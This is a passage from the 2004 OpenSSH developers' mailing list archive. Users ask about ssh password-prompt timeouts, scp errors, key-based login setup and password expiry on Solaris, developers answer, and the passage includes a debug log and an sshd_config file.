accepting the password on a file > descriptor however. Search the mailing list and bugzilla.mindrot.org. Probably this one: http://bugzilla.mindrot.org/show_bug.cgi?id=69 -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From roland.mainz at nrubsig.org Tue Mar 16 15:20:07 2004 From: roland.mainz at nrubsig.org (Roland Mainz) Date: Tue, 16 Mar 2004 05:20:07 +0100 Subject: Support for forwarding more than one X11 display... Message-ID: <40568077.13EDB8BD@nrubsig.org> Hi! ---- Would it be possible to forward multiple X11 displays using the current ssh2 _protocol_ ? ---- Bye, Roland -- __ . . __ (o.\ \/ /.o) roland.mainz at nrubsig.org \__\/\/__/ MPEG specialist, C&&JAVA&&Sun&&Unix programmer /O /==\ O\ TEL +49 2426 901568 FAX +49 2426 901569 (;O/ \/ \O;) From postmaster at kinn.com Tue Mar 16 05:37:28 2004 From: postmaster at kinn.com (postmaster at kinn.com) Date: Tue, 16 Mar 2004 02:37:28 +0800 Subject: Message delayed (chik@top2.ficnet.net.tw) Message-ID: Your message has been delayed and is still awaiting delivery to the following recipient(s): chik at top2.ficnet.net.tw Message delayed Your message is delayed Message for domain top2.ficnet.net.tw delayed at kinn.com. Unable to deliver to domain for 12 hours. Will continue trying for 96 hours. No action is required on your part. Last attempt failed because: DNS server could not be contacted or generated an unexpected response -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: multipart/alternative Size: 0 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040316/71a46408/attachment.bin From Steve.Belt at motorola.com Wed Mar 17 03:50:40 2004 From: Steve.Belt at motorola.com (Steve Belt (rgpg70)) Date: Tue, 16 Mar 2004 10:50:40 -0600 Subject: ssh timeout Message-ID: <40573060.3050601@motorola.com> Hello, I am wondering if there is any way I can get ssh to timeout (return) if nothing is entered when prompted for a password? I understand there is a LoginGraceTime value that can be used in the sshd_config file, but that still doesn't make ssh return (exit) when no password is ever entered. The command just hangs until a is pressed. Is there any way to make it return after the LoginGraceTime limit has expired? I am using ssh inside a script that cycles over several hosts. If a host does not have an updated authorized_keys file, it prompts for a password. The script then hangs while ssh waits for an answer. I would like ssh to return (exit) eventually so the script can continue. Thanks, -- Steve "Wheat" Belt Motorola, Inc. Steve.Belt at motorola.com 6501 William Cannon Dr. West, MD OE341 512-895-2268 Austin, TX 78735 From postadal at suse.cz Wed Mar 17 09:14:11 2004 From: postadal at suse.cz (Petr Ostadal) Date: Tue, 16 Mar 2004 22:14:11 -0000 Subject: Change request For OpenSSH 3.8p1 In-Reply-To: References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: Hi all, I don't like continue this flame if we have or haven't the threads. I ask, how can solve problems which forking have (see bug ttp://bugzilla.mindrot.org/show_bug.cgi?id=768). Without threads the pam_krb5 and others pam modules doesn't work (in bugs is nicely described where is the problems). Thnx in advance for your answer. Petr -- Best Regards, Petr Ostadal Software Developer --------------------------------------------------------------------- SuSE CR, s.r.o. e-mail: postadal at suse.cz Drahobejlova 27 tel: +420 296 542 382 190 00 Praha 9 fax: +420 296 542 374 Czech Republic http://www.suse.cz On Mon, 1 Mar 2004, Damien Miller wrote: > I've been away from mail for a couple of days, so I am catching up on this > rather amusing thread. > > On Sat, 28 Feb 2004, John Davidorff Pell wrote: > > > I'm not terribly interested in having threads or not having threads, it > > was the This Will Never Happen Because I Say So And Am G-d attitude > > that shocked me. > > It isn't because "I" say so - you are making incorrect assumptions. For > instance, if I just did what I wanted, threads would have been removed by > now (and probably a bit more too). > > I am quite sure that I speak for all the developers when I say that we > don't want threads used in OpenSSH. > > -d > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > From djm at mindrot.org Wed Mar 17 09:28:13 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 17 Mar 2004 09:28:13 +1100 Subject: Change request For OpenSSH 3.8p1 In-Reply-To: References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: <40577F7D.4020300@mindrot.org> Petr Ostadal wrote: > Hi all, > > I don't like continue this flame if we have or haven't the threads. > > I ask, how can solve problems which forking have (see bug > ttp://bugzilla.mindrot.org/show_bug.cgi?id=768). Without threads the > pam_krb5 and others pam modules doesn't work (in bugs is nicely described > where is the problems). I mentioned several approaches back at the start of the thread. -d From dtucker at zip.com.au Wed Mar 17 16:45:30 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 17 Mar 2004 16:45:30 +1100 Subject: ssh timeout In-Reply-To: <40573060.3050601@motorola.com> References: <40573060.3050601@motorola.com> Message-ID: <4057E5FA.9090304@zip.com.au> Steve Belt (rgpg70) wrote: > I am wondering if there is any way I can get ssh to timeout (return) if > nothing is entered when prompted for a password? I understand there is > a LoginGraceTime value that can be used in the sshd_config file, but > that still doesn't make ssh return (exit) when no password is ever > entered. The command just hangs until a is pressed. Is there > any way to make it return after the LoginGraceTime limit has expired? > I am using ssh inside a script that cycles over several hosts. If a > host does not have an updated authorized_keys file, it prompts for a > password. The script then hangs while ssh waits for an answer. I would > like ssh to return (exit) eventually so the script can continue. (Assuming you're using OpenSSH since you crossposted to openssh-unix-dev) You could use "ssh -o PreferredAuthentications=hostbased,publickey yourhost" so it won't try password or keyboard-interactive. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From postmaster at kinn.com Wed Mar 17 05:49:06 2004 From: postmaster at kinn.com (postmaster at kinn.com) Date: Wed, 17 Mar 2004 02:49:06 +0800 Subject: Message delayed (chik@top2.ficnet.net.tw) Message-ID: Your message has been delayed and is still awaiting delivery to the following recipient(s): chik at top2.ficnet.net.tw Message delayed Your message is delayed Message for domain top2.ficnet.net.tw delayed at kinn.com. Unable to deliver to domain for 36 hours. Will continue trying for 72 hours. No action is required on your part. Last attempt failed because: DNS server could not be contacted or generated an unexpected response -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: multipart/alternative Size: 0 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040317/85f0a929/attachment.bin From Steve.Belt at motorola.com Thu Mar 18 02:16:02 2004 From: Steve.Belt at motorola.com (Steve Belt (rgpg70)) Date: Wed, 17 Mar 2004 09:16:02 -0600 Subject: ssh timeout References: <40573060.3050601@motorola.com> <4057E5FA.9090304@zip.com.au> Message-ID: <40586BB2.2080908@motorola.com> Thanks for the info, Darren. That worked for me. Appreciate it. :) Cheers, Steve Darren Tucker wrote: > Steve Belt (rgpg70) wrote: > >> I am wondering if there is any way I can get ssh to timeout (return) >> if nothing is entered when prompted for a password? I understand >> there is a LoginGraceTime value that can be used in the sshd_config >> file, but that still doesn't make ssh return (exit) when no password >> is ever entered. The command just hangs until a is >> pressed. Is there any way to make it return after the LoginGraceTime >> limit has expired? I am using ssh inside a script that cycles over >> several hosts. If a host does not have an updated authorized_keys >> file, it prompts for a password. The script then hangs while ssh >> waits for an answer. I would like ssh to return (exit) eventually so >> the script can continue. > > > (Assuming you're using OpenSSH since you crossposted to openssh-unix-dev) > > You could use "ssh -o PreferredAuthentications=hostbased,publickey > yourhost" so it won't try password or keyboard-interactive. > -- Steve "Wheat" Belt Motorola, Inc. Steve.Belt at motorola.com 6501 William Cannon Dr. West, MD OE341 512-895-2268 Austin, TX 78735 From Steve.Belt at motorola.com Wed Mar 17 03:50:40 2004 From: Steve.Belt at motorola.com (Steve Belt (rgpg70)) Date: Tue, 16 Mar 2004 10:50:40 -0600 Subject: ssh timeout Message-ID: <40573060.3050601@motorola.com> Hello, I am wondering if there is any way I can get ssh to timeout (return) if nothing is entered when prompted for a password? I understand there is a LoginGraceTime value that can be used in the sshd_config file, but that still doesn't make ssh return (exit) when no password is ever entered. The command just hangs until a is pressed. Is there any way to make it return after the LoginGraceTime limit has expired? I am using ssh inside a script that cycles over several hosts. If a host does not have an updated authorized_keys file, it prompts for a password. The script then hangs while ssh waits for an answer. I would like ssh to return (exit) eventually so the script can continue. Thanks, -- Steve "Wheat" Belt Motorola, Inc. Steve.Belt at motorola.com 6501 William Cannon Dr. West, MD OE341 512-895-2268 Austin, TX 78735 From dtucker at zip.com.au Wed Mar 17 16:45:30 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 17 Mar 2004 16:45:30 +1100 Subject: ssh timeout In-Reply-To: <40573060.3050601@motorola.com> References: <40573060.3050601@motorola.com> Message-ID: <4057E5FA.9090304@zip.com.au> Steve Belt (rgpg70) wrote: > I am wondering if there is any way I can get ssh to timeout (return) if > nothing is entered when prompted for a password? I understand there is > a LoginGraceTime value that can be used in the sshd_config file, but > that still doesn't make ssh return (exit) when no password is ever > entered. The command just hangs until a is pressed. Is there > any way to make it return after the LoginGraceTime limit has expired? > I am using ssh inside a script that cycles over several hosts. If a > host does not have an updated authorized_keys file, it prompts for a > password. The script then hangs while ssh waits for an answer. I would > like ssh to return (exit) eventually so the script can continue. (Assuming you're using OpenSSH since you crossposted to openssh-unix-dev) You could use "ssh -o PreferredAuthentications=hostbased,publickey yourhost" so it won't try password or keyboard-interactive. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From Steve.Belt at motorola.com Thu Mar 18 02:16:02 2004 From: Steve.Belt at motorola.com (Steve Belt (rgpg70)) Date: Wed, 17 Mar 2004 09:16:02 -0600 Subject: ssh timeout References: <40573060.3050601@motorola.com> <4057E5FA.9090304@zip.com.au> Message-ID: <40586BB2.2080908@motorola.com> Thanks for the info, Darren. That worked for me. Appreciate it. :) Cheers, Steve Darren Tucker wrote: > Steve Belt (rgpg70) wrote: > >> I am wondering if there is any way I can get ssh to timeout (return) >> if nothing is entered when prompted for a password? I understand >> there is a LoginGraceTime value that can be used in the sshd_config >> file, but that still doesn't make ssh return (exit) when no password >> is ever entered. The command just hangs until a is >> pressed. Is there any way to make it return after the LoginGraceTime >> limit has expired? I am using ssh inside a script that cycles over >> several hosts. If a host does not have an updated authorized_keys >> file, it prompts for a password. The script then hangs while ssh >> waits for an answer. I would like ssh to return (exit) eventually so >> the script can continue. > > > (Assuming you're using OpenSSH since you crossposted to openssh-unix-dev) > > You could use "ssh -o PreferredAuthentications=hostbased,publickey > yourhost" so it won't try password or keyboard-interactive. > -- Steve "Wheat" Belt Motorola, Inc. Steve.Belt at motorola.com 6501 William Cannon Dr. West, MD OE341 512-895-2268 Austin, TX 78735 From yhu_2003 at yahoo.com Thu Mar 18 13:23:57 2004 From: yhu_2003 at yahoo.com (Eric Hu) Date: Wed, 17 Mar 2004 18:23:57 -0800 (PST) Subject: scp does not work Message-ID: <20040318022357.6216.qmail@web60103.mail.yahoo.com> Hi, I got a word "HELLO" after I type scp file server:. and nothing was transfered. There was also a warning message: Executing scp1 compatibility. I am running OpenSSH_3.6.1p1+CAN-2003-0693, SSH protocols 1.5/2.0, OpenSSL 0x0090702f in Mac OSX panther. Thanks. Eric __________________________________ Do you Yahoo!? Yahoo! Mail - More reliable, more storage, less spam http://mail.yahoo.com From djm at mindrot.org Thu Mar 18 13:47:05 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 18 Mar 2004 13:47:05 +1100 Subject: scp does not work In-Reply-To: <20040318022357.6216.qmail@web60103.mail.yahoo.com> References: <20040318022357.6216.qmail@web60103.mail.yahoo.com> Message-ID: <40590DA9.1050902@mindrot.org> Eric Hu wrote: > Hi, I got a word "HELLO" after I type scp file > server:. and nothing was transfered. There was also a > warning message: Executing scp1 compatibility. OpenSSH doesn't make that message. See also http://www.openssh.com/faq.html#2.9 -d From imhaeuse at physik.uni-wuppertal.de Fri Mar 19 01:36:40 2004 From: imhaeuse at physik.uni-wuppertal.de (Martin =?iso-8859-1?q?Imh=E4user?=) Date: Thu, 18 Mar 2004 15:36:40 +0100 Subject: ssh only with password Message-ID: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> Hello, I must relogin on the same machine in my shell with ssh and without password. For this I tried the procedure ssh-keygen -t dsa and ssh-keygen -t rsa. I copied the entries in /.ssh/id_dsa.pub and /.ssh/id_rsa.pub in /.ssh/authorized_keys When I open a shell I type exec ssh-agent $SHELL and then ssh-add and give my passphrases. When I now type ssh machinename my PC wants my password. I am running Redhat 7.3.3 and, sorry, I am a beginner using Linux. Thank you in advance, Martin From kmack at sgi.sk.ca Fri Mar 19 09:49:30 2004 From: kmack at sgi.sk.ca (Kevin Mack) Date: Thu, 18 Mar 2004 16:49:30 -0600 Subject: 3.8p1 password expiry, Solaris 8 Message-ID: <20040318224930.GA22788@gibraltar> I can't seem to get the /etc/shadow password expiry working on 3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. Logins aren't affected after a 'passwd -df' or 'passwd -f'. Here's the configure, using gcc 3.2: --prefix=/usr --sysconfdir=/etc/ssh --with-tcp-wrappers \ --without-pam --libexecdir=/usr/sbin --mandir=/usr/share/man \ --with-shadow 'uname -a' output: SunOS tech04 5.8 Generic_108528-24 sun4u sparc SUNW,UltraAX-i2 'ssh -V': OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 'ssh -vvv ' output: OpenSSH_3.7.1p2, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 debug1: Reading configuration data /etc/ssh/ssh_config debug3: cipher ok: blowfish-cbc [blowfish-cbc] debug3: ciphers ok: [blowfish-cbc] debug2: ssh_connect: needpriv 0 debug1: Connecting to tech04 [172.21.2.140] port 22. debug1: Connection established. debug1: identity file /home/kevin/.ssh/identity type -1 debug1: identity file /home/kevin/.ssh/id_rsa type -1 debug3: Not a RSA1 key file /home/kevin/.ssh/id_dsa. debug2: key_type_from_name: unknown key type '-----BEGIN' debug3: key_read: missing keytype debug2: key_type_from_name: unknown key type 'Proc-Type:' debug3: key_read: missing keytype debug2: key_type_from_name: unknown key type 'DEK-Info:' debug3: key_read: missing keytype debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug2: key_type_from_name: unknown key type '-----END' debug3: key_read: missing keytype debug1: identity file /home/kevin/.ssh/id_dsa type 2 debug1: Remote protocol version 2.0, remote software version OpenSSH_3.8p1-pwexp26 debug1: match: OpenSSH_3.8p1-pwexp26 pat OpenSSH* debug1: Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_3.7.1p2 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: blowfish-cbc debug2: kex_parse_kexinit: blowfish-cbc debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc at lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc at lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found hmac-md5 debug1: kex: server->client blowfish-cbc hmac-md5 none debug2: mac_init: found hmac-md5 debug1: kex: client->server blowfish-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug2: dh_gen_key: priv key bits set: 130/256 debug2: bits set: 1599/3191 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug3: check_host_in_hostfile: filename /home/kevin/.ssh/known_hosts debug3: check_host_in_hostfile: match line 65 debug3: check_host_in_hostfile: filename /home/kevin/.ssh/known_hosts debug3: check_host_in_hostfile: match line 65 debug1: Host 'tech04' is known and matches the RSA host key. debug1: Found key in /home/kevin/.ssh/known_hosts:65 debug2: bits set: 1586/3191 debug1: ssh_rsa_verify: signature correct debug2: kex_derive_keys debug2: set_newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: expecting SSH2_MSG_NEWKEYS debug2: set_newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: SSH2_MSG_SERVICE_REQUEST sent debug2: service_accept: ssh-userauth debug1: SSH2_MSG_SERVICE_ACCEPT received debug2: key: /home/kevin/.ssh/id_dsa (0x808e580) debug2: key: /home/kevin/.ssh/identity ((nil)) debug2: key: /home/kevin/.ssh/id_rsa ((nil)) debug1: Authentications that can continue: publickey,password,keyboard-interactive debug3: start over, passed a different list publickey,password,keyboard-interactive debug3: preferred publickey,keyboard-interactive,password debug3: authmethod_lookup publickey debug3: remaining preferred: keyboard-interactive,password debug3: authmethod_is_enabled publickey debug1: Next authentication method: publickey debug1: Offering public key: /home/kevin/.ssh/id_dsa debug3: send_pubkey_test debug2: we sent a publickey packet, wait for reply debug1: Server accepts key: pkalg ssh-dss blen 434 debug2: input_userauth_pk_ok: fp b2:6f:21:29:25:46:cf:04:0d:c6:18:d4:20:77:71:18 debug3: sign_and_send_pubkey debug1: Authentication succeeded (publickey). debug1: channel 0: new [client-session] debug3: ssh_session2_open: channel_new: 0 debug2: channel 0: send open debug1: Entering interactive session. debug2: callback start debug2: ssh_session2_setup: id 0 debug2: channel 0: request pty-req debug3: tty_make_modes: ospeed 38400 debug3: tty_make_modes: ispeed 38400 debug3: tty_make_modes: 1 3 debug3: tty_make_modes: 2 28 debug3: tty_make_modes: 3 8 debug3: tty_make_modes: 4 21 debug3: tty_make_modes: 5 4 debug3: tty_make_modes: 6 0 debug3: tty_make_modes: 7 0 debug3: tty_make_modes: 8 17 debug3: tty_make_modes: 9 19 debug3: tty_make_modes: 10 26 debug3: tty_make_modes: 12 18 debug3: tty_make_modes: 13 23 debug3: tty_make_modes: 14 22 debug3: tty_make_modes: 18 15 debug3: tty_make_modes: 30 1 debug3: tty_make_modes: 31 0 debug3: tty_make_modes: 32 0 debug3: tty_make_modes: 33 0 debug3: tty_make_modes: 34 0 debug3: tty_make_modes: 35 0 debug3: tty_make_modes: 36 1 debug3: tty_make_modes: 37 0 debug3: tty_make_modes: 38 1 debug3: tty_make_modes: 39 0 debug3: tty_make_modes: 40 0 debug3: tty_make_modes: 41 1 debug3: tty_make_modes: 50 1 debug3: tty_make_modes: 51 1 debug3: tty_make_modes: 52 0 debug3: tty_make_modes: 53 1 debug3: tty_make_modes: 54 1 debug3: tty_make_modes: 55 1 debug3: tty_make_modes: 56 0 debug3: tty_make_modes: 57 0 debug3: tty_make_modes: 58 0 debug3: tty_make_modes: 59 1 debug3: tty_make_modes: 60 1 debug3: tty_make_modes: 61 1 debug3: tty_make_modes: 62 0 debug3: tty_make_modes: 70 1 debug3: tty_make_modes: 71 0 debug3: tty_make_modes: 72 1 debug3: tty_make_modes: 73 0 debug3: tty_make_modes: 74 0 debug3: tty_make_modes: 75 0 debug3: tty_make_modes: 90 1 debug3: tty_make_modes: 91 1 debug3: tty_make_modes: 92 0 debug3: tty_make_modes: 93 0 debug2: x11_get_proto: /usr/X11R6/bin/xauth list :0.0 2>/dev/null debug1: Requesting X11 forwarding with authentication spoofing. debug2: channel 0: request x11-req debug1: Requesting authentication agent forwarding. debug2: channel 0: request auth-agent-req at openssh.com debug2: channel 0: request shell debug2: fd 3 setting TCP_NODELAY debug2: callback done debug2: channel 0: open confirm rwindow 0 rmax 32768 debug2: channel 0: rcvd adjust 131072 Last login: Thu Mar 18 16:32:16 2004 from 2k144158 Sun Microsystems Inc. SunOS 5.8 Generic Patch October 2001 tech04 /export/home/kevin >exit logout debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug2: channel 0: rcvd eof debug2: channel 0: output open -> drain debug2: channel 0: obuf empty debug2: channel 0: close_write debug2: channel 0: output drain -> closed debug2: channel 0: rcvd close debug2: channel 0: close_read debug2: channel 0: input open -> closed debug3: channel 0: will not send data after close debug2: channel 0: almost dead debug2: channel 0: gc: notify user debug2: channel 0: gc: user detached debug2: channel 0: send close debug2: channel 0: is dead debug2: channel 0: garbage collecting debug1: channel 0: free: client-session, nchannels 1 debug3: channel 0: status: The following connections are open: #0 client-session (t4 r0 i3/0 o3/0 fd -1/-1) debug3: channel 0: close_fds r -1 w -1 e 6 Connection to tech04 closed. debug1: Transferred: stdin 0, stdout 0, stderr 30 bytes in 1.6 seconds debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 18.9 debug1: Exit status 0 Contents of /etc/ssh/sshd_config: # $OpenBSD: sshd_config,v 1.65 2003/08/28 12:54:34 markus Exp $ # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options change a # default value. #Port 22 #Protocol 2,1 Protocol 2 #ListenAddress 0.0.0.0 #ListenAddress :: # HostKey for protocol version 1 #HostKey /etc/ssh/ssh_host_key # HostKeys for protocol version 2 #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_dsa_key # Lifetime and size of ephemeral version 1 server key #KeyRegenerationInterval 1h KeyRegenerationInterval 1800 #ServerKeyBits 768 ServerKeyBits 1024 # Logging #obsoletes QuietMode and FascistLogging #SyslogFacility AUTH #LogLevel INFO # Authentication: #LoginGraceTime 2m LoginGraceTime 60 #PermitRootLogin yes PermitRootLogin without-password #StrictModes yes #RSAAuthentication yes #PubkeyAuthentication yes #AuthorizedKeysFile .ssh/authorized_keys # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #RhostsRSAAuthentication no # similar for protocol version 2 #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # RhostsRSAAuthentication and HostbasedAuthentication #IgnoreUserKnownHosts no IgnoreUserKnownHosts yes # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes # To disable tunneled clear text passwords, change to no here! #PasswordAuthentication yes #PermitEmptyPasswords no # Change to no to disable s/key passwords #ChallengeResponseAuthentication yes # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCreds yes # Set this to 'yes' to enable PAM authentication (via challenge-response) # and session processing. Depending on your PAM configuration, this may # bypass the setting of 'PasswordAuthentication' #UsePAM yes #AllowTcpForwarding yes #GatewayPorts no GatewayPorts yes #X11Forwarding no X11Forwarding yes #X11DisplayOffset 10 #X11UseLocalhost yes #PrintMotd yes #PrintLastLog yes #KeepAlive yes #UseLogin no #UsePrivilegeSeparation yes #PermitUserEnvironment no #Compression yes #ClientAliveInterval 0 #ClientAliveCountMax 3 #UseDNS yes #PidFile /var/run/sshd.pid #MaxStartups 10 MaxStartups 20 # no default banner path #Banner /some/path # override default of no subsystems Subsystem sftp /usr/sbin/sftp-server --- From dtucker at zip.com.au Fri Mar 19 10:15:35 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 10:15:35 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <20040318224930.GA22788@gibraltar> References: <20040318224930.GA22788@gibraltar> Message-ID: <405A2D97.4030809@zip.com.au> Kevin Mack wrote: > I can't seem to get the /etc/shadow password expiry working on > 3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. > Logins aren't affected after a 'passwd -df' or 'passwd -f'. [...] > 'ssh -V': > OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 I never released a pwexp patch for 3.8p1, where did you get that? > debug2: we sent a publickey packet, wait for reply > debug1: Server accepts key: pkalg ssh-dss blen 434 The password expiry code in 3.8p1 is only checked for password or keyboard-interactive authentications. It does not get checked for public-key (or hostbased) logins. I posted a more details explanation of the differences a while back: http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From kmack at sgi.sk.ca Fri Mar 19 10:46:15 2004 From: kmack at sgi.sk.ca (Kevin Mack) Date: Thu, 18 Mar 2004 17:46:15 -0600 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A2D97.4030809@zip.com.au> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> Message-ID: <20040318234615.GA22990@gibraltar> On Fri, Mar 19, 2004 at 10:15:35AM +1100, Darren Tucker wrote: > Kevin Mack wrote: > >I can't seem to get the /etc/shadow password expiry working on > >3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. > >Logins aren't affected after a 'passwd -df' or 'passwd -f'. > [...] > >'ssh -V': > >OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 > > I never released a pwexp patch for 3.8p1, where did you get that? Oops, I edited version.h for some reason! Otherwise, it's a straight 3.8p1. > >debug2: we sent a publickey packet, wait for reply > >debug1: Server accepts key: pkalg ssh-dss blen 434 > > The password expiry code in 3.8p1 is only checked for password or > keyboard-interactive authentications. It does not get checked for > public-key (or hostbased) logins. > > I posted a more details explanation of the differences a while back: > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 Thanks Darren, we'll use 3.7.1p2 for now. From dberezin at acs.rutgers.edu Fri Mar 19 10:50:31 2004 From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 18:50:31 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A2D97.4030809@zip.com.au> Message-ID: <009401c40d43$cc328790$5bd90680@acsdev78> I have just tried expiring a password on Solaris 9 box running 3.8p1 and it works with keyboard-interactive authentication, but does not work with password authentication. If I just expire password with passwd -f, then I simply get permission denied. If I also clear it, passwd -df, then I first get a prompt for the password and then permission denied. -Dmitry. > -----Original Message----- > From: openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org > [mailto:openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org] On > Behalf Of Darren Tucker > Sent: Thursday, March 18, 2004 6:16 PM > To: Kevin Mack > Cc: openssh-unix-dev at mindrot.org > Subject: Re: 3.8p1 password expiry, Solaris 8 > > Kevin Mack wrote: > > I can't seem to get the /etc/shadow password expiry working on > > 3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. > > Logins aren't affected after a 'passwd -df' or 'passwd -f'. > [...] > > 'ssh -V': > > OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep > 2003 > > I never released a pwexp patch for 3.8p1, where did you get that? > > > debug2: we sent a publickey packet, wait for reply > > debug1: Server accepts key: pkalg ssh-dss blen 434 > > The password expiry code in 3.8p1 is only checked for password or > keyboard-interactive authentications. It does not get checked for > public-key (or hostbased) logins. > > I posted a more details explanation of the differences a while back: > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 > > -- > Darren Tucker (dtucker at zip.com.au) > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 > Good judgement comes with experience. Unfortunately, the experience > usually comes from bad judgement. > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev From dberezin at acs.rutgers.edu Fri Mar 19 11:02:33 2004 From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 19:02:33 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009401c40d43$cc328790$5bd90680@acsdev78> Message-ID: <009501c40d45$7ababf20$5bd90680@acsdev78> Oops, bad test. (I must have forgotten to restart sshd after making changes to sshd_config. Here 